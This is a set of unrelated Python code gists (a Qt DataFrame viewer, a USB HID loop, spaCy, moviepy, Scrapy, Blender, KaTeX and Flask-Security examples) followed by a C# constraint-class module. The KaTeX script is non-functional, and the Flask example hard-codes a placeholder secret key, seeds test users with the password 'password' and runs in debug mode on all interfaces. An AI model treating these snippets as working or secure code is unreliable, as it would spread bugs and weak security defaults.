# TODO
def on_list_itemChanged(self, item):
###
# Figure out what "select all" check-box state should be
###
self.list.blockSignals(True)
if item is self._action_select_all:
# Handle "select all" item click
if item.checkState() == QtCore.Qt.Checked:
state = QtCore.Qt.Checked
else:
state = QtCore.Qt.Unchecked
# Select/deselect all items
for i in range(self.list.count()):
if i is self._action_select_all: continue
i = self.list.item(i)
i.setCheckState(state)
else:
# Non "select all" item; figure out what "select all" should be
if item.checkState() == QtCore.Qt.Unchecked:
self._action_select_all.setCheckState(QtCore.Qt.Unchecked)
else:
# "select all" only checked if all other items are checked
for i in range(self.list.count()):
i = self.list.item(i)
if i is self._action_select_all: continue
if i.checkState() == QtCore.Qt.Unchecked:
self._action_select_all.setCheckState(QtCore.Qt.Unchecked)
break
else:
self._action_select_all.setCheckState(QtCore.Qt.Checked)
self.list.blockSignals(False)
###
# Filter dataframe according to list
###
include = []
for i in range(self.list.count()):
i = self.list.item(i)
if i is self._action_select_all: continue
if i.checkState() == QtCore.Qt.Checked:
include.append(str(i.text()))
self.parent().blockSignals(True)
self.parent().filterIsIn(self.col_ix, include)
self.parent().blockSignals(False)
self.parent()._enable_widgeted_cells()
class DataFrameItemDelegate(QtGui.QStyledItemDelegate):
"""Implements WidgetedCell"""
def __init__(self):
super(DataFrameItemDelegate, self).__init__()
self._cell_widget_states = {}
def createEditor(self, parent, option, index):
data = index.data(DataFrameModel.RawDataRole)
true_index = index.data(DataFrameModel.RawIndexRole)
if isinstance(data, WidgetedCell):
# Make new widget
widget_class = data.widget
# Give out widget our cell parent so it knows where to paint
widget = widget_class(parent)
try:
# Find existing widget if we can
widget_state = self._cell_widget_states[true_index]
except KeyError:
pass
else:
try:
widget.setWidgetedCellState(widget_state)
except AttributeError:
# Not implementing the WidgetedCell interface
pass
return widget
else:
return super(DataFrameItemDelegate, self).createEditor(parent, option, index)
def setModelData(self, widget, model, index):
# Try to save the state of the widget
try:
widget_state = widget.getWidgetedCellState()
except AttributeError:
# Not implementing the WidgetedCell interface
return
true_index = index.data(DataFrameModel.RawIndexRole)
self._cell_widget_states[true_index] = widget_state
def paint(self, painter, option, index):
d = index.data(DataFrameModel.RawDataRole)
if isinstance(d, WidgetedCell):
# Don't paint, create editor instead
return None
else:
return super(DataFrameItemDelegate, self).paint(painter, option, index)
class DataFrameWidget(QtGui.QTableView):
dataFrameChanged = QtCore.pyqtSignal()
cellClicked = QtCore.pyqtSignal(int, int)
def __init__(self, parent=None, df=None):
"""DataFrameTable
Create a widget to display a pandas DataFrame.
Args:
parent (QObject)
Parent object (likely window or canvas)
df (pandas DataFrame, optional)
DataFrame to display
"""
super(DataFrameWidget, self).__init__(parent)
self.defaultExcelFile = "temp.xls"
self.defaultExcelSheet = "Output"
# Set up view
self._data_model = DataFrameModel()
self.setModel(self._data_model)
# Signals/Slots
self._data_model.modelReset.connect(self.dataFrameChanged)
self._data_model.dataChanged.connect(self.dataFrameChanged)
self.clicked.connect(self._on_click)
self.dataFrameChanged.connect(self._enable_widgeted_cells)
# Set up the item delegate
delegate = DataFrameItemDelegate()
self.setItemDelegate(delegate)
# Show the edit widget as soon as the user clicks in the cell
# (needed for item delegate)
self.setEditTriggers(self.CurrentChanged)
# Initialize to the passed dataframe
if df is None:
df = pandas.DataFrame()
self._data_model.setDataFrame(df)
#self.setSortingEnabled(True)
# Create header menu bindings
self.horizontalHeader().setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
self.horizontalHeader().customContextMenuRequested.connect(self._header_menu)
self._enable_widgeted_cells()
def make_cell_context_menu(self, menu, row_ix, col_ix):
"""Create the mneu displayed when right-clicking on a cell.
Overrite this method to add custom right-click options
Args:
menu (QMenu)
Menu to which to add actions
row_ix (int)
Row location in dataframe
col_ix (int)
Column location in dataframe
Returns:
menu (QMenu)
Same menu passed in, with added actions
"""
cell_val = self.df.iget_value(row_ix, col_ix)
# Quick Filter
def _quick_filter(s_col):
return s_col == cell_val
menu.addAction(self._icon('CommandLink'),
"Quick Filter", partial(self._data_model.filterFunction, col_ix=col_ix, function=_quick_filter))
# GreaterThan/LessThan filter
def _cmp_filter(s_col, op):
return op(s_col, cell_val)
menu.addAction("Show Greater Than",
partial(self._data_model.filterFunction, col_ix=col_ix,
function=partial(_cmp_filter, op=operator.ge)))
menu.addAction("Show Less Than",
partial(self._data_model.filterFunction, col_ix=col_ix,
function=partial(_cmp_filter, op=operator.le)))
menu.addAction(self._icon('DialogResetButton'),
"Clear",
self._data_model.reset)
menu.addSeparator()
# Save to Excel
def _to_excel():
from subprocess import Popen
self.df.to_excel(self.defaultExcelFile, self.defaultExcelSheet)
Popen(self.defaultExcelFile, shell=True)
menu.addAction("Open in Excel",
_to_excel)
return menu
def contextMenuEvent(self, event):
"""Implements right-clicking on cell.
NOTE: You probably want to override make_cell_context_menu, not this
function, when subclassing.
"""
row_ix = self.rowAt(event.y())
col_ix = self.columnAt(event.x())
if row_ix < 0 or col_ix < 0:
return #out of bounds
menu = QtGui.QMenu(self)
menu = self.make_cell_context_menu(menu, row_ix, col_ix)
menu.exec_(self.mapToGlobal(event.pos()))
def _header_menu(self, pos):
"""Create popup menu used for header"""
menu = QtGui.QMenu(self)
col_ix = self.horizontalHeader().logicalIndexAt(pos)
if col_ix == -1:
# Out of bounds
return
# Filter Menu Action
menu.addAction(DynamicFilterMenuAction(self, menu, col_ix))
menu.addAction(FilterListMenuWidget(self, menu, col_ix))
menu.addAction(self._icon('DialogResetButton'),
"Reset",
self._data_model.reset)
# Sort Ascending/Descending Menu Action
menu.addAction(self._icon('TitleBarShadeButton'),
"Sort Ascending",
partial(self._data_model.sort, col_ix=col_ix, order=QtCore.Qt.AscendingOrder))
menu.addAction(self._icon('TitleBarUnshadeButton'),
"Sort Descending",
partial(self._data_model.sort, col_ix=col_ix, order=QtCore.Qt.DescendingOrder))
menu.addSeparator()
# Hide
menu.addAction("Hide", partial(self.hideColumn, col_ix))
# Show (column to left and right)
for i in (-1, 1):
if self.isColumnHidden(col_ix+i):
menu.addAction("Show %s" % self._data_model.headerData(col_ix+i, QtCore.Qt.Horizontal),
partial(self.showColumn, col_ix+i))
menu.exec_(self.mapToGlobal(pos))
def setDataFrame(self, df):
self._data_model.setDataFrame(df)
self.resizeColumnsToContents()
def filter(self, col_ix, needle):
return self._data_model.filter(col_ix, needle)
def filterIsIn(self, col_ix, include):
return self._data_model.filterIsIn(col_ix, include)
@property
def df(self):
return self._data_model.df
@df.setter
def df(self, dataFrame):
# Use the "hard setting" of the dataframe because anyone who's interacting with the
# DataFrameWidget (ie, end user) would be setting this
self._data_model.setDataFrame(dataFrame)
def keyPressEvent(self, event):
"""Implements keyboard shortcuts"""
if event.matches(QtGui.QKeySequence.Copy):
self.copy()
else:
# Pass up
super(DataFrameWidget, self).keyPressEvent(event)
def copy(self):
"""Copy selected cells into copy-buffer"""
selection = self.selectionModel()
indexes = selection.selectedIndexes()
if len(indexes) < 1:
# Nothing selected
return
# Capture selection into a DataFrame
items = pandas.DataFrame()
for idx in indexes:
row = idx.row()
col = idx.column()
item = idx.data()
if item:
items = items.set_value(row, col, str(item.toString()))
# Make into tab-delimited text (best for Excel)
items = list(items.itertuples(index=False))
s = '\n'.join(['\t'.join([cell for cell in row]) for row in items])
# Send to clipboard
QtGui.QApplication.clipboard().setText(s)
def _icon(self, icon_name):
"""Convinence function to get standard icons from Qt"""
if not icon_name.startswith('SP_'):
icon_name = 'SP_' + icon_name
icon = getattr(QtGui.QStyle, icon_name, None)
if icon is None:
raise Exception("Unknown icon %s" % icon_name)
return self.style().standardIcon(icon)
def _on_click(self, index):
if index.isValid():
self.cellClicked.emit(index.row(), index.column())
def _enable_widgeted_cells(self):
# Update all cells with WidgetedCell to have persistent editors
model = self.model()
if model is None:
return
for r in xrange(model.rowCount()):
for c in xrange(model.columnCount()):
idx = model.index(r,c)
d = model.data(idx, DataFrameModel.RawDataRole)
if isinstance(d, WidgetedCell):
self.openPersistentEditor(idx)
class DataFrameApp(QtGui.QMainWindow):
"""Sample DataFrameTable Application"""
def __init__(self, df, title="Inspecting DataFrame"):
super(DataFrameApp, self).__init__()
# State variables
self.title_base = title
# Initialize main data table
self.table = DataFrameWidget(self)
self.table.dataFrameChanged.connect(self.datatable_updated)
self.table.setDataFrame(df)
self.setCentralWidget(self.table)
# Set window size
col_size = sum([self.table.columnWidth(i) for i in range(0,99)])
col_size = min(col_size+75, 1500)
self.setGeometry(300, 300, col_size, 250)
def datatable_updated(self):
# Change title to reflect updated size
df = self.table.df
title = self.title_base + ' [%dx%d]' % (len(df.index), len(df.columns))
self.setWindowTitle(title)
class ExampleWidgetForWidgetedCell(QtGui.QComboBox):
"""
To implement persistent state for the widgeted cell, you must provide
`getWidgetedCellState` and `setWidgetedCellState` methods. This is how
the WidgetedCell framework can create and destroy your widget as needed.
"""
def __init__(self, parent):
super(ExampleWidgetForWidgetedCell, self).__init__(parent)
self.addItem("Option A")
self.addItem("Option B")
self.addItem("Option C")
self.setCurrentIndex(0)
def getWidgetedCellState(self):
return self.currentIndex()
def setWidgetedCellState(self, state):
self.setCurrentIndex(state)
if __name__ == '__main__':
# Create a quick example
_app = QtGui.QApplication(sys.argv)
import string
import random
rnd_txt = lambda: "".join( [random.choice(string.letters[:26]) for i in xrange(15)] )
df = [['a','b','c']*3]
for j in xrange(5):
r = []
for k in xrange(6):
r.append(rnd_txt())
r.append(random.randint(1,20))
r.append(random.random()*10)
r.append(WidgetedCell(ExampleWidgetForWidgetedCell))
df.append(r)
df = pandas.DataFrame(df, columns=['AAA','BBB','CCC','DDD','EEE','FFF','GGG','HHH','III'])
app = DataFrameApp(df)
app.show()
_app.exec_()
```
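A brief usage sketch for the widget above (not part of the original gist; the DataFrame contents and column indices are illustrative assumptions, and it only calls methods defined in the snippet):
```python
# Hypothetical sketch: driving DataFrameWidget's filtering API directly.
_qt_app = QtGui.QApplication([])  # a QApplication must exist before creating widgets
widget = DataFrameWidget(df=pandas.DataFrame({'AAA': ['foo', 'bar'], 'BBB': [1, 2]}))
widget.filter(0, 'fo')        # substring filter on column 0, case-insensitive
widget.filterIsIn(1, ['1'])   # keep rows whose column-1 value is in the list
widget._data_model.reset()    # clear all filters back to the original frame
```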
#### File: hard-gists/f6effc4468cca6f4e8f0/snippet.py
```python
import os
import sys
import usb.core
import usb.util
from time import sleep
import random
# handler called when a report is received
def rx_handler(data):
print 'recv: ', data
def findHIDDevice(mbed_vendor_id, mbed_product_id):
# Find device
hid_device = usb.core.find(idVendor=mbed_vendor_id,idProduct=mbed_product_id)
if not hid_device:
print "No device connected"
else:
sys.stdout.write('mbed found\n')
if hid_device.is_kernel_driver_active(0):
try:
hid_device.detach_kernel_driver(0)
except usb.core.USBError as e:
sys.exit("Could not detatch kernel driver: %s" % str(e))
try:
hid_device.set_configuration()
hid_device.reset()
except usb.core.USBError as e:
sys.exit("Could not set configuration: %s" % str(e))
endpoint = hid_device[0][(0,0)][0]
while True:
data = [0x0] * 16
#read the data
bytes = hid_device.read(endpoint.bEndpointAddress, 8)
rx_handler(bytes);
for i in range(8):
data[i] = bytes[i]
data[i+8] = random.randint(0, 255)
hid_device.write(1, data)
if __name__ == '__main__':
# The vendor ID and product ID used in the Mbed program
mbed_vendor_id = 0x1234
mbed_product_id = 0x0006
# Search the Mbed, attach rx handler and send data
findHIDDevice(mbed_vendor_id, mbed_product_id)
```
#### File: hard-gists/f788cfd227cb94d0843235a2542026fd/snippet.py
```python
from allennlp.commands import DEFAULT_MODELS
from allennlp.common.file_utils import cached_path
from allennlp.service.predictors import SemanticRoleLabelerPredictor
from allennlp.models.archival import load_archive
import spacy
from spacy.tokens import Token
class SRLComponent(object):
'''
A SpaCy pipeline component for SRL
'''
name = 'Semantic Role Labeler'
def __init__(self):
archive = load_archive(self._get_srl_model())
self.predictor = SemanticRoleLabelerPredictor.from_archive(archive, "semantic-role-labeling")
Token.set_extension('srl_arg0')
Token.set_extension('srl_arg1')
def __call__(self, doc):
# See https://github.com/allenai/allennlp/blob/master/allennlp/service/predictors/semantic_role_labeler.py#L74
words = [token.text for token in doc]
for i, word in enumerate(doc):
if word.pos_ == "VERB":
verb = word.text
verb_labels = [0 for _ in words]
verb_labels[i] = 1
instance = self.predictor._dataset_reader.text_to_instance(doc, verb_labels)
output = self.predictor._model.forward_on_instance(instance, -1)
tags = output['tags']
# TODO: Tagging/dependencies can be done more elegantly
if "B-ARG0" in tags:
start = tags.index("B-ARG0")
end = max([i for i, x in enumerate(tags) if x == "I-ARG0"] + [start]) + 1
word._.set("srl_arg0", doc[start:end])
if "B-ARG1" in tags:
start = tags.index("B-ARG1")
end = max([i for i, x in enumerate(tags) if x == "I-ARG1"] + [start]) + 1
word._.set("srl_arg1", doc[start:end])
return doc
def _get_srl_model(self):
return cached_path(DEFAULT_MODELS['semantic-role-labeling'])
def demo():
nlp = spacy.load("en")
nlp.add_pipe(SRLComponent(), after='ner')
doc = nlp("Apple sold 1 million Plumbuses this month.")
for w in doc:
if w.pos_ == "VERB":
print("('{}', '{}', '{}')".format(w._.srl_arg0, w, w._.srl_arg1))
# ('Apple', 'sold', '1 million Plumbuses)
```
#### File: hard-gists/fa43af59f3ecf9b10c88/snippet.py
```python
from pylab import *
import moviepy.editor as mp
from moviepy.video.io.bindings import mplfig_to_npimage
# PARAMETERS OF THE CURVE AND THE GIF
curve = lambda t : ( cos(80*t) - cos(t)**3, sin(t) - sin(80*t)**3 )
curve_latex = (r"$\left(\,\, \cos(80t) - \cos(t^3),\,\,\,"
+r"\sin(t) - \sin(80t)^3 \,\,\right)$")
t_min=0
t_max = 2*pi
number_of_points = 20000
gif_name = "test.gif"
gif_duration = 5
gif_fps = 15
# PRECOMPUTE THE CURVE
times = linspace(0, 2*pi, number_of_points)
curve_x, curve_y = zip(*[curve(t) for t in times])
# INITIALIZE THE FIGURE
fig, ax = subplots(1, figsize=(4,4), facecolor='white')
ax.axis("off")
ax.set_title(curve_latex)  # was fun_latex, which is not defined anywhere in the gist
line, = ax.plot(curve_x, curve_y)
# ANIMATE WITH MOVIEPY
def make_frame(t):
index_max = int((1.0 * t / gif_duration) * number_of_points)  # was clip_duration (undefined)
line.set_xdata(curve_x[:index_max])
line.set_ydata(curve_y[:index_max])
return mplfig_to_npimage(fig)
clip = mp.VideoClip(make_frame, duration=gif_duration)
clip = clip.fx( mp.vfx.freeze, t='end', freeze_duration=1)
clip.write_gif(gif_name, fps=gif_fps)
```
#### File: hard-gists/fc1527d6d9492b59c610/snippet.py
```python
import json
from scrapy.crawler import Crawler
from scrapy.contrib.loader import ItemLoader
from scrapy.contrib.loader.processor import Join, MapCompose, TakeFirst
from scrapy import log, signals, Spider, Item, Field
from scrapy.settings import Settings
from twisted.internet import reactor
# define an item class
class DmozItem(Item):
title = Field()
link = Field()
desc = Field()
# define an item loader with input and output processors
class DmozItemLoader(ItemLoader):
default_input_processor = MapCompose(unicode.strip)
default_output_processor = TakeFirst()
desc_out = Join()
# define a pipeline
class JsonWriterPipeline(object):
def __init__(self):
self.file = open('items.jl', 'wb')
def process_item(self, item, spider):
line = json.dumps(dict(item)) + "\n"
self.file.write(line)
return item
# define a spider
class DmozSpider(Spider):
name = "dmoz"
allowed_domains = ["dmoz.org"]
start_urls = [
"http://www.dmoz.org/Computers/Programming/Languages/Python/Books/",
"http://www.dmoz.org/Computers/Programming/Languages/Python/Resources/"
]
def parse(self, response):
for sel in response.xpath('//ul/li'):
loader = DmozItemLoader(DmozItem(), selector=sel, response=response)
loader.add_xpath('title', 'a/text()')
loader.add_xpath('link', 'a/@href')
loader.add_xpath('desc', 'text()')
yield loader.load_item()
# callback fired when the spider is closed
def callback(spider, reason):
stats = spider.crawler.stats.get_stats() # collect/log stats?
# stop the reactor
reactor.stop()
# instantiate settings and provide a custom configuration
settings = Settings()
settings.set('ITEM_PIPELINES', {
'__main__.JsonWriterPipeline': 100
})
# instantiate a crawler passing in settings
crawler = Crawler(settings)
# instantiate a spider
spider = DmozSpider()
# configure signals
crawler.signals.connect(callback, signal=signals.spider_closed)
# configure and start the crawler
crawler.configure()
crawler.crawl(spider)
crawler.start()
# start logging
log.start()
# start the reactor (blocks execution)
reactor.run()
```
#### File: hard-gists/fd65891daf183d99d91cb83b89e2a4c7/snippet.py
```python
bl_info = {
"name": "lathe",
"author": "<NAME>",
"version": (0, 9,3),
"blender": (2, 78, 0),
"location": "Add > Mesh",
"description": "Create a lathe",
"warning": "",
"wiki_url": "",
"category": "Add Mesh",
}
import bpy
def main(context):
for ob in context.scene.objects:
print(ob)
#Define functions for modifiers stack
def modifierstack():
#create screw modifier and setup
bpy.ops.object.modifier_add(type='SCREW')
bpy.context.object.modifiers["Screw"].steps = 64
bpy.context.object.modifiers["Screw"].render_steps = 64
bpy.context.object.modifiers["Screw"].use_normal_flip = True
#create solidify modifier and setup
bpy.ops.object.modifier_add(type='SOLIDIFY')
bpy.context.object.modifiers["Solidify"].thickness = 0.1
#create edgesplit modifier and setup
bpy.ops.object.modifier_add(type='EDGE_SPLIT')
bpy.context.object.modifiers["EdgeSplit"].show_viewport = False
bpy.context.object.modifiers["EdgeSplit"].show_render = False
# lathe class
class lathe(bpy.types.Operator):
"""Create a lathe object"""
bl_idname = "object.lathe"
bl_label = "Lathe"
bl_options = {'REGISTER', 'UNDO'}
def invoke(self, context, event):
#init front view, create a cube, name it, toggle edit mode and delete all to start from scratch
bpy.ops.view3d.viewnumpad(type='FRONT')
bpy.ops.mesh.primitive_cube_add(radius=1, view_align=False, enter_editmode=False, location=(0, 0, 0), layers=(True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False))
bpy.context.object.name = "Lathe"
bpy.ops.object.editmode_toggle()
bpy.ops.mesh.delete(type='VERT')
#create first vertex at cursor
bpy.ops.mesh.primitive_vert_add()
modifierstack()
bpy.context.object.modifiers["Screw"].use_normal_calculate = True
return {'FINISHED'}
# lathe_libre class
class lathe_libre(bpy.types.Operator):
"""Create a lathe object with free draw"""
bl_idname = "object.lathe_libre"
bl_label = "Lathe_libre"
bl_options = {'REGISTER', 'UNDO'}
def invoke(self, context, event):
#init front view, create a curve, name it, toggle edit mode and delete all to start from scratch
bpy.ops.view3d.viewnumpad(type='FRONT')
bpy.ops.curve.primitive_bezier_curve_add(view_align=False, enter_editmode=False, location=(0, 0, 0), layers=(True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False))
bpy.context.object.name = "Lathe_libre"
bpy.ops.object.editmode_toggle()
bpy.ops.curve.delete(type='VERT')
modifierstack()
return {'FINISHED'}
#definition of the names and operators
def menu_item(self, context):
self.layout.operator(lathe.bl_idname, text="lathe", icon="PLUGIN")
self.layout.operator(lathe_libre.bl_idname, text="lathe_libre", icon="PLUGIN")
#add the names and operators to mesh add menu
def register():
bpy.utils.register_module(__name__)
bpy.types.INFO_MT_mesh_add.append(menu_item)
#Unregister the names and operators from mesh add menu
def unregister():
bpy.utils.unregister_module(__name__)
bpy.types.INFO_MT_mesh_add.remove(menu_item)
if __name__ == "__main__":
register()
```
#### File: hard-gists/fe4fd5f27a4811cb0187/snippet.py
```python
import re
import execjs
def find_equations(string):
""" Take in a string, and convert everything between $ ... $ into an inline
equation and everything between $$ ... $$ into a centred equation. """
doubledollar = re.compile(ur"\$\$([^$]+)\$\$")
singledollar = re.compile(ur"(?<![\$])\$([^$]+)\$(?!\$)")
inline_equations = re.findall(singledollar, string)
centred_equations = re.findall(doubledollar, string)
return inline_equations, centred_equations
def remove_dollars(string):
""" Takes equation delimited by dollars as input, and removes the dollar
signs at the beginning and end. """
return re.sub("[\$]", "", string)
def import_katex():
""" Imports katex into the local namespace for use as
`katex.call("katex.renderToString", "E = mc^2") """
source = open("lib/katex.js").read()
katex = execjs.compile(source)
return True
def eqn_to_html(eqn_string):
""" Takes equation string, e.g. "E = mc^2", and outputs KaTeX HTML """
try:
return katex.call("katex.renderToString", "E = mc^2")
except NameError:
print "Error rendering KaTeX HTML. Please ensure that you have",
print "imported KaTeX into the Python namespace."
return False
def replace_eqn(string):
""" Takes a block of text, finds the equations and replaces the text with
HTML code """
pass
with open("katex_markdown.md") as f:
original_content = f.read()
import_katex()
inline, centred = find_equations(original_content)  # the regex groups already exclude the dollar signs
head = """<head>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="lib/katex.min.css">
</head>
"""
body = """<body>
""", content, """
</body>
"""
html = """<!DOCTYPE HTML>
<html>
""", head, """
""", body, """
</html>
"""
with open("katexpage.html", 'w') as f:
f.write(html)
```
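The `replace_eqn` function above is left as a stub in the gist. Below is a hedged sketch of one way it could be completed, reusing the regexes from `find_equations` and the `eqn_to_html` helper; this is an assumption about the intended behaviour, not the author's implementation.
```python
import re

def replace_eqn_sketch(string):
    """Possible completion of replace_eqn(): swap $...$ / $$...$$ spans for KaTeX HTML."""
    # Handle centred ($$...$$) equations first so the inline pattern
    # does not consume their delimiters.
    string = re.sub(r"\$\$([^$]+)\$\$", lambda m: eqn_to_html(m.group(1)), string)
    string = re.sub(r"(?<!\$)\$([^$]+)\$(?!\$)", lambda m: eqn_to_html(m.group(1)), string)
    return string
```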
#### File: hard-gists/ffb1b5f12d7ad787f6e4/snippet.py
```python
from flask import Flask, render_template
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.security import current_user, login_required, RoleMixin, Security, \
SQLAlchemyUserDatastore, UserMixin, utils
from flask_mail import Mail
from flask.ext.admin import Admin
from flask.ext.admin.contrib import sqla
from wtforms.fields import PasswordField
# Initialize Flask and set some config values
app = Flask(__name__)
app.config['DEBUG']=True
# Replace this with your own secret key
app.config['SECRET_KEY'] = 'super-secret'
# The database must exist (although it's fine if it's empty) before you attempt to access any page of the app
# in your browser.
# I used a PostgreSQL database, but you could use another type of database, including an in-memory SQLite database.
# You'll need to connect as a user with sufficient privileges to create tables and read and write to them.
# Replace this with your own database connection string.
#xxxxx
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:xxxxxxxx@localhost/flask_example'
# Set config values for Flask-Security.
# We're using PBKDF2 with salt.
app.config['SECURITY_PASSWORD_HASH'] = '<PASSWORD>'
# Replace this with your own salt.
app.config['SECURITY_PASSWORD_SALT'] = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
# Flask-Security optionally sends email notification to users upon registration, password reset, etc.
# It uses Flask-Mail behind the scenes.
# Set mail-related config values.
# Replace this with your own "from" address
app.config['SECURITY_EMAIL_SENDER'] = '<EMAIL>'
# Replace the next five lines with your own SMTP server settings
app.config['MAIL_SERVER'] = 'email-smtp.us-west-2.amazonaws.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USE_SSL'] = True
app.config['MAIL_USERNAME'] = 'xxxxxxxxxxxxxxxxxxxx'
app.config['MAIL_PASSWORD'] = '<PASSWORD>'
# Initialize Flask-Mail and SQLAlchemy
mail = Mail(app)
db = SQLAlchemy(app)
# Create a table to support a many-to-many relationship between Users and Roles
roles_users = db.Table(
'roles_users',
db.Column('user_id', db.Integer(), db.ForeignKey('user.id')),
db.Column('role_id', db.Integer(), db.ForeignKey('role.id'))
)
# Role class
class Role(db.Model, RoleMixin):
# Our Role has three fields, ID, name and description
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(80), unique=True)
description = db.Column(db.String(255))
# __str__ is required by Flask-Admin, so we can have human-readable values for the Role when editing a User.
# If we were using Python 2.7, this would be __unicode__ instead.
def __str__(self):
return self.name
# __hash__ is required to avoid the exception TypeError: unhashable type: 'Role' when saving a User
def __hash__(self):
return hash(self.name)
# User class
class User(db.Model, UserMixin):
# Our User has six fields: ID, email, password, active, confirmed_at and roles. The roles field represents a
# many-to-many relationship using the roles_users table. Each user may have no role, one role, or multiple roles.
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(255), unique=True)
password = db.Column(db.String(255))
active = db.Column(db.Boolean())
confirmed_at = db.Column(db.DateTime())
roles = db.relationship(
'Role',
secondary=roles_users,
backref=db.backref('users', lazy='dynamic')
)
# Initialize the SQLAlchemy data store and Flask-Security.
user_datastore = SQLAlchemyUserDatastore(db, User, Role)
security = Security(app, user_datastore)
# Executes before the first request is processed.
@app.before_first_request
def before_first_request():
# Create any database tables that don't exist yet.
db.create_all()
# Create the Roles "admin" and "end-user" -- unless they already exist
user_datastore.find_or_create_role(name='admin', description='Administrator')
user_datastore.find_or_create_role(name='end-user', description='End user')
# Create two Users for testing purposes -- unless they already exists.
# In each case, use Flask-Security utility function to encrypt the password.
encrypted_password = utils.encrypt_password('password')
if not user_datastore.get_user('<EMAIL>'):
user_datastore.create_user(email='<EMAIL>', password=<PASSWORD>)
if not user_datastore.get_user('<EMAIL>'):
user_datastore.create_user(email='<EMAIL>', password=encrypted_password)
# Commit any database changes; the User and Roles must exist before we can add a Role to the User
db.session.commit()
# Give one User has the "end-user" role, while the other has the "admin" role. (This will have no effect if the
# Users already have these Roles.) Again, commit any database changes.
user_datastore.add_role_to_user('<EMAIL>', 'end-user')
user_datastore.add_role_to_user('<EMAIL>', 'admin')
db.session.commit()
# Displays the home page.
@app.route('/')
# Users must be authenticated to view the home page, but they don't have to have any particular role.
# Flask-Security will display a login form if the user isn't already authenticated.
@login_required
def index():
return render_template('index.html')
# Customized User model for SQL-Admin
class UserAdmin(sqla.ModelView):
# Don't display the password on the list of Users
column_exclude_list = ('password',)
# Don't include the standard password field when creating or editing a User (but see below)
form_excluded_columns = ('password',)
# Automatically display human-readable names for the current and available Roles when creating or editing a User
column_auto_select_related = True
# Prevent administration of Users unless the currently logged-in user has the "admin" role
def is_accessible(self):
return current_user.has_role('admin')
# On the form for creating or editing a User, don't display a field corresponding to the model's password field.
# There are two reasons for this. First, we want to encrypt the password before storing in the database. Second,
# we want to use a password field (with the input masked) rather than a regular text field.
def scaffold_form(self):
# Start with the standard form as provided by Flask-Admin. We've already told Flask-Admin to exclude the
# password field from this form.
form_class = super(UserAdmin, self).scaffold_form()
# Add a password field, naming it "password2" and labeling it "New Password".
form_class.password2 = PasswordField('<PASSWORD>')
return form_class
# This callback executes when the user saves changes to a newly-created or edited User -- before the changes are
# committed to the database.
def on_model_change(self, form, model, is_created):
# If the password field isn't blank...
if len(model.password2):
# ... then encrypt the new password prior to storing it in the database. If the password field is blank,
# the existing password in the database will be retained.
model.password = utils.encrypt_password(model.password2)
# Customized Role model for SQL-Admin
class RoleAdmin(sqla.ModelView):
# Prevent administration of Roles unless the currently logged-in user has the "admin" role
def is_accessible(self):
return current_user.has_role('admin')
# Initialize Flask-Admin
admin = Admin(app)
# Add Flask-Admin views for Users and Roles
admin.add_view(UserAdmin(User, db.session))
admin.add_view(RoleAdmin(Role, db.session))
# If running locally, listen on all IP addresses, port 8080
if __name__ == '__main__':
app.run(
host='0.0.0.0',
port=int('8080'),
debug=app.config['DEBUG']
)
``` |
{
"source": "jjhenkel/nteract",
"score": 3
} |
#### File: codebook/csharp/constraints.py
```python
import os
class CBName:
_kind = 'C#.Constraints.Name'
def __init__(self, value):
self.kind = CBName._kind
self.value = value
self.precedence = 6
def __str__(self):
return 'name=`{}`'.format(self.value)
def to_path(self, path):
return '"{}"={}'.format(self.value, path)
@staticmethod
def kind():
return CBName._kind
class CBSameText:
_kind = 'C#.Constraints.SameText'
def __init__(self, value):
self.kind = CBSameText._kind
self.value = value
def __str__(self):
return 'text_same_as=`{}`'.format(self.value)
@staticmethod
def kind():
return CBSameText._kind
class CBExactlyTwoChildren:
_kind = 'C#.Constraints.ExactlyTwoChildren'
def __init__(self):
self.kind = CBExactlyTwoChildren._kind
def __str__(self):
return 'child_count=2'
@staticmethod
def kind():
return CBExactlyTwoChildren._kind
class CBExactlyTwoNormalArgs:
_kind = 'C#.Constraints.ExactlyTwoNormalArgs'
def __init__(self):
self.kind = CBExactlyTwoNormalArgs._kind
def __str__(self):
return 'normal_args=2'
@staticmethod
def kind():
return CBExactlyTwoNormalArgs._kind
class CBEveryChildHasType:
_kind = 'C#.Constraints.EveryChildHasType'
def __init__(self, value):
self.kind = CBEveryChildHasType._kind
self.value = value
def __str__(self):
return 'every_child_type=`{}`'.format(self.value)
@staticmethod
def kind():
return CBEveryChildHasType._kind
class CBText:
_kind = 'C#.Constraints.Text'
def __init__(self, value):
self.kind = CBText._kind
self.value = value
self.precedence = 7
def __str__(self):
return 'text=`{}`'.format(self.value)
@staticmethod
def kind():
return CBText._kind
class CBFieldIndex:
_kind = 'C#.Constraints.FieldIndex'
def __init__(self, field, index=None):
self.kind = CBFieldIndex._kind
self.field = field
self.index = index
assert self.field is not None or self.index is not None
self.precedence = 8
def __str__(self):
if self.field is not None and self.index is not None:
return '$.f_{}[{}]'.format(self.field, self.index)
elif self.field is not None:
return '$.f_{}'.format(self.field)
elif self.index is not None:
return '$.[{}]'.format(self.index)
else:
assert False
@staticmethod
def kind():
return CBFieldIndex._kind
class CBStepsAway:
_kind = 'C#.Constraints.StepsAway'
def __init__(self, steps, op=None):
self.kind = CBStepsAway._kind
self.steps = steps
self.op = op
self.precedence = 9
def __str__(self):
if self.op is None:
return '$steps_away{}'
else:
return '$steps_away{{{}{}}}'.format(self.op, self.steps)
@staticmethod
def kind():
return CBStepsAway._kind
class CBAllowCastsAndParens:
_kind = 'C#.Constraints.AllowCastsAndParens'
def __init__(self, max_depth = None):
self.kind = CBAllowCastsAndParens._kind
self.max_depth = max_depth
self.precedence = -1
def __str__(self):
if self.max_depth is None:
return '$allow_casts_and_parens'
else:
return '$allow_casts_and_parens[<={}]'.format(self.max_depth)
@staticmethod
def kind():
return CBAllowCastsAndParens._kind
